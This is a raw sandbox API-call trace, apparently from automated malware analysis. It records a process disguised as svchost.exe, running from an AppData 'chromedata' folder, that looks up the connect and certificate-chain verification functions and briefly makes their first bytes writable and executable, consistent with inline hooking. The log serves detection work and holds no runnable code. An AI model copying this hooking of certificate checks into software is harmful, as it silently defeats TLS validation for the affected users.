	[0193.836] lstrcmpA (lpString1="WahRemoveHandleContext", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahWaitForNotification", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="WahWriteLSPEvent", lpString2="connect") returned 1
	[0193.836] lstrcmpA (lpString1="__WSAFDIsSet", lpString2="connect") returned -1
	[0193.836] lstrcmpA (lpString1="accept", lpString2="connect") returned -1
	[0193.836] lstrcmpA (lpString1="bind", lpString2="connect") returned -1
	[0193.836] lstrcmpA (lpString1="closesocket", lpString2="connect") returned -1
	[0193.836] lstrcmpA (lpString1="connect", lpString2="connect") returned 0
	[0193.836] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75a96bdd, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x20) returned 1
	[0193.838] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75a96bdd, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x40) returned 1
	[0193.839] GetModuleHandleA (lpModuleName="crypt32.dll") returned 0x75610000
	[0193.839] GetProcAddress (hModule=0x75610000, lpProcName="CertGetCertificateChain") returned 0x75626ccf
	[0193.839] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x75610000
	[0193.839] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.839] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCloseStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertComparePublicKeyInfo", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertControlStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateCTLEntryFromCertificateContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateCertificateChainEngine", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertCreateSelfSignCertificate", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDeleteCRLFromStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDeleteCTLFromStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDeleteCertificateFromStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDuplicateCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDuplicateCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDuplicateCertificateChain", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDuplicateCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertDuplicateStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCRLContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCRLsInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCTLContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCTLsInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCertificateContextProperties", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumCertificatesInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumPhysicalStore", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumSubjectInSortedCTL", lpString2="CertGetCertificateChain") returned -1
	[0193.840] lstrcmpA (lpString1="CertEnumSystemStore", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertEnumSystemStoreLocation", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindAttribute", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindCRLInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindCTLInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindCertificateInCRL", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindCertificateInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindChainInStore", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindExtension", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindRDNAttr", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindSubjectInCTL", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFindSubjectInSortedCTL", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCRLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCTLContext", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCertificateChain", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCertificateChainEngine", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCertificateChainList", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeCertificateContext", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertFreeServerOcspResponseContext", lpString2="CertGetCertificateChain") returned -1
	[0193.841] lstrcmpA (lpString1="CertGetCRLContextProperty", lpString2="CertGetCertificateChain") returned 1
	[0193.841] lstrcmpA (lpString1="CertGetCRLFromStore", lpString2="CertGetCertificateChain") returned 1
	[0193.841] lstrcmpA (lpString1="CertGetCTLContextProperty", lpString2="CertGetCertificateChain") returned 1
	[0193.841] lstrcmpA (lpString1="CertGetCertificateChain", lpString2="CertGetCertificateChain") returned 0
	[0193.841] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75626ccf, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x20) returned 1
	[0193.843] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x75626ccf, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x40) returned 1
	[0193.844] GetProcAddress (hModule=0x75610000, lpProcName="CertVerifyCertificateChainPolicy") returned 0x7562cae2
	[0193.844] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x75610000
	[0193.844] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.844] lstrcmpA (lpString1="CertCloseStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertComparePublicKeyInfo", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertControlStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateCRLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateCTLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateCTLEntryFromCertificateContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateCertificateChainEngine", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateCertificateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertCreateSelfSignCertificate", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDeleteCRLFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDeleteCTLFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDeleteCertificateFromStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDuplicateCRLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDuplicateCTLContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDuplicateCertificateChain", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDuplicateCertificateContext", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertDuplicateStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertEnumCRLContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertEnumCRLsInStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertEnumCTLContextProperties", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] lstrcmpA (lpString1="CertEnumCTLsInStore", lpString2="CertVerifyCertificateChainPolicy") returned -1
	[0193.845] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7562cae2, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x20) returned 1
	[0193.847] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7562cae2, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x50ff974 | out: lpflOldProtect=0x50ff974*=0x40) returned 1
	[0193.848] socket (af=2, type=1, protocol=6) returned 0x8c4
	[0193.848] WSAIoctl (in: s=0x8c4, dwIoControlCode=0xc8000006, lpvInBuffer=0x50ffad4, cbInBuffer=0x10, lpvOutBuffer=0x50ffacc, cbOutBuffer=0x4, lpcbBytesReturned=0x50ffad0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x50ffacc, lpcbBytesReturned=0x50ffad0, lpOverlapped=0x0) returned 0
	[0193.848] closesocket (s=0x8c4) returned 0
	[0193.849] GetModuleHandleA (lpModuleName=0x0) returned 0xc50000
	[0193.849] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74f17852, dwSize=0x7, flNewProtect=0x40, lpflOldProtect=0x50ff98c | out: lpflOldProtect=0x50ff98c*=0x20) returned 1
	[0193.851] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74f17852, dwSize=0x7, flNewProtect=0x20, lpflOldProtect=0x50ff98c | out: lpflOldProtect=0x50ff98c*=0x40) returned 1

Thread:
	id = 351
	os_tid = 0xde4


Process:
	id = "38"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17180"
	os_pid = "0x6d8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 215
	os_tid = 0x524

	[0197.383] ResetEvent (hEvent=0x8) returned 1
	[0197.383] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.383] ResetEvent (hEvent=0x8) returned 1
	[0197.383] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.562] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0197.562] ResetEvent (hEvent=0x8) returned 1
	[0197.562] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.564] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileAttributesW") returned 0x76b664ff
	[0197.564] ResetEvent (hEvent=0x8) returned 1
	[0197.564] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.566] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0197.566] ResetEvent (hEvent=0x8) returned 1
	[0197.566] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.568] GetProcAddress (hModule=0x76b10000, lpProcName="UnmapViewOfFile") returned 0x76b5db13
	[0197.568] ResetEvent (hEvent=0x8) returned 1
	[0197.568] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.570] GetProcAddress (hModule=0x76b10000, lpProcName="HeapValidate") returned 0x76b525dd
	[0197.571] ResetEvent (hEvent=0x8) returned 1
	[0197.571] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.573] GetProcAddress (hModule=0x76b10000, lpProcName="HeapSize") returned 0x77389bec
	[0197.573] ResetEvent (hEvent=0x8) returned 1
	[0197.573] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.575] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0197.575] ResetEvent (hEvent=0x8) returned 1
	[0197.575] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.577] GetProcAddress (hModule=0x76b10000, lpProcName="GetTempPathA") returned 0x76b76a65
	[0197.577] ResetEvent (hEvent=0x8) returned 1
	[0197.577] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.603] GetProcAddress (hModule=0x76b10000, lpProcName="FormatMessageW") returned 0x76b554a3
	[0197.603] ResetEvent (hEvent=0x8) returned 1
	[0197.603] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.606] GetProcAddress (hModule=0x76b10000, lpProcName="GetDiskFreeSpaceA") returned 0x76b6d7d2
	[0197.606] ResetEvent (hEvent=0x8) returned 1
	[0197.606] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.608] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileAttributesA") returned 0x76b61de6
	[0197.608] ResetEvent (hEvent=0x8) returned 1
	[0197.608] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.610] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileAttributesExW") returned 0x76b5273d
	[0197.610] ResetEvent (hEvent=0x8) returned 1
	[0197.610] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.612] GetProcAddress (hModule=0x76b10000, lpProcName="OutputDebugStringW") returned 0x76b46b91
	[0197.612] ResetEvent (hEvent=0x8) returned 1
	[0197.612] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.614] GetProcAddress (hModule=0x76b10000, lpProcName="FlushViewOfFile") returned 0x76b483d2
	[0197.614] ResetEvent (hEvent=0x8) returned 1
	[0197.614] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.616] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileA") returned 0x76b5cee8
	[0197.616] ResetEvent (hEvent=0x8) returned 1
	[0197.616] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.619] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObjectEx") returned 0x76b5bab0
	[0197.619] ResetEvent (hEvent=0x8) returned 1
	[0197.619] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.621] GetProcAddress (hModule=0x76b10000, lpProcName="GetVersionExA") returned 0x76b63861
	[0197.621] ResetEvent (hEvent=0x8) returned 1
	[0197.621] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.623] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteFileA") returned 0x76b547cb
	[0197.623] ResetEvent (hEvent=0x8) returned 1
	[0197.623] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.625] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteFileW") returned 0x76b50f62
	[0197.625] ResetEvent (hEvent=0x8) returned 1
	[0197.625] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.627] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0197.627] ResetEvent (hEvent=0x8) returned 1
	[0197.627] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.629] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemInfo") returned 0x76b63728
	[0197.629] ResetEvent (hEvent=0x8) returned 1
	[0197.629] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.632] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0197.632] ResetEvent (hEvent=0x8) returned 1
	[0197.632] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.634] GetProcAddress (hModule=0x76b10000, lpProcName="HeapCompact") returned 0x76b47cf6
	[0197.634] ResetEvent (hEvent=0x8) returned 1
	[0197.634] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.636] GetProcAddress (hModule=0x76b10000, lpProcName="HeapDestroy") returned 0x76b52301
	[0197.636] ResetEvent (hEvent=0x8) returned 1
	[0197.636] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.638] GetProcAddress (hModule=0x76b10000, lpProcName="UnlockFile") returned 0x76b76417
	[0197.638] ResetEvent (hEvent=0x8) returned 1
	[0197.638] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.641] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileMappingA") returned 0x76b597e9
	[0197.641] ResetEvent (hEvent=0x8) returned 1
	[0197.641] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.643] GetProcAddress (hModule=0x76b10000, lpProcName="LockFileEx") returned 0x76b7692f
	[0197.643] ResetEvent (hEvent=0x8) returned 1
	[0197.643] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.646] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileSize") returned 0x76b50273
	[0197.646] ResetEvent (hEvent=0x8) returned 1
	[0197.646] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.648] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0197.648] ResetEvent (hEvent=0x8) returned 1
	[0197.648] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.651] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0197.651] ResetEvent (hEvent=0x8) returned 1
	[0197.651] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.653] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileW") returned 0x76b5cc56
	[0197.653] ResetEvent (hEvent=0x8) returned 1
	[0197.653] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.656] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibrary") returned 0x76b5d9d0
	[0197.656] ResetEvent (hEvent=0x8) returned 1
	[0197.656] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.658] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0197.658] ResetEvent (hEvent=0x8) returned 1
	[0197.658] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.661] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0197.661] ResetEvent (hEvent=0x8) returned 1
	[0197.661] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.663] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTime") returned 0x76b5ced8
	[0197.663] ResetEvent (hEvent=0x8) returned 1
	[0197.663] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.666] GetProcAddress (hModule=0x76b10000, lpProcName="FormatMessageA") returned 0x76b78868
	[0197.666] ResetEvent (hEvent=0x8) returned 1
	[0197.666] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.668] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileMappingW") returned 0x76b50a7f
	[0197.668] ResetEvent (hEvent=0x8) returned 1
	[0197.668] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.670] GetProcAddress (hModule=0x76b10000, lpProcName="MapViewOfFile") returned 0x76b5899b
	[0197.670] ResetEvent (hEvent=0x8) returned 1
	[0197.671] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.673] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0197.673] ResetEvent (hEvent=0x8) returned 1
